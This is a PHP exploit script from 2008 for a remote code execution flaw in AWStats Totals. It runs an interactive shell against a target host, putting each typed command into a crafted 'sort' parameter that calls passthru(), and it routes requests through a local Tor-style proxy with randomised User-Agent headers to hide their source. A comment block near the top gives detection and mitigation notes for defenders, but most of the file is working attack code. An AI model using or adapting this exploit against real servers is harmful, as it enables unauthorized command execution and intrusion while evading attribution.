
awstats-exec.txt

Posted on 04 September 2008

<?php
/*
 * Remote Execution Exploit for AWStats Totals vulnerability (Interactive Shell)
 *
 * Author: Ricardo Almeida
 * email: ricardojba[at]aeiou[DoT]pt
 *
 * Greetz
 * The hacker webzine authored by Ronald van den Heetkamp for his code
 *
 * Credits: Vulnerabilities reported by Emory University.
 * http://userwww.service.emory.edu/~ekenda2/EMORY-2008-01.txt
 */

/*
 * Reviewer notes (what this listing tells a defender)
 *
 * Request shape: every command is a single GET for awstatstotals.php whose
 * `sort` parameter decodes to  "].passthru('<input>').exit().$a["  .
 * Closing a quoted array index and then concatenating function calls only has
 * an effect if the application places the `sort` value inside PHP source that
 * is evaluated at run time; the root cause is described in the advisory
 * referenced above and should be confirmed there.
 *
 * Detection: in web access logs, look for awstatstotals.php requests whose
 * `sort` value is anything other than a plain column name, in particular
 * quotes, brackets or parentheses (raw or as %22 %5d %27 %28 %29) and PHP
 * function names. This client percent-encodes only spaces, so the typed
 * command is readable in the logged query string. The User-Agent is randomised
 * per request and the traffic leaves through a local proxy, so match on the
 * request itself rather than on client address or agent string.
 *
 * Mitigation: install the fixed AWStats Totals release named in the advisory,
 * validate `sort` against an allow-list of known column keys, and keep
 * statistics pages behind authentication. Listing passthru and similar
 * functions in disable_functions is defence in depth only.
 */

/**
 * Fetch a URL with cURL through a local proxy, using a randomly assembled
 * User-Agent header.
 *
 * @param string $url Full URL to request.
 * @return string|bool Result of curl_exec() (headers included, since
 *                     CURLOPT_HEADER is on) when the final status is 200,
 *                     otherwise the string "Fail! :<status> ".
 */
function wrap($url){
    $browsers = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
    $systems  = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');

    // Product/version and platform/version are drawn independently, so the
    // resulting header is often an implausible combination.
    $agent = sprintf(
        '%s/%d.%d (%s %d.%d; en-US;)',
        $browsers[rand(0,3)],
        rand(1,8),
        rand(0,9),
        $systems[rand(0,5)],
        rand(1,7),
        rand(0,9)
    );

    # tor or other proxy
    $proxy   = '127.0.0.1:8118';
    $timeout = '300';

    $handle = curl_init();
    curl_setopt_array($handle, array(
        CURLOPT_PROXY          => $proxy,
        CURLOPT_URL            => $url,
        CURLOPT_HEADER         => 1,
        CURLOPT_USERAGENT      => $agent,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_TIMEOUT        => $timeout,
    ));
    $response = curl_exec($handle);
    $info     = curl_getinfo($handle);
    curl_close($handle);

    // With redirects followed, http_code is the status of the last response.
    if ($info['http_code'] != '200') {
        return "Fail! :".$info['http_code']." ";
    }

    return $response;
}

// Command-line entry: exactly one argument, the host name.
if ($argc != 2) {
    die("Usage: awtotalhack.php <host> ");
}

array_shift($argv);
$host = $argv[0];

# Start the interactive shell
while (true) {
    fwrite(STDOUT, "[shell:~ # ");

    // Only spaces are percent-encoded; everything else is sent as typed.
    $cmd = str_replace(' ', '%20', trim(fgets(STDIN)));
    if ($cmd == "exit") {
        die();
    }

    // One GET per prompt line; the typed text sits between the two fixed
    // halves of the `sort` value (see the reviewer notes at the top).
    $attackurl = "http://".$host."/"."awstatstotals.php?sort=%22%5d%2epassthru%28%27".$cmd."%27%29%2eexit%28%29%2e%24a%5b%22";
    echo wrap($attackurl);
}
?>

 
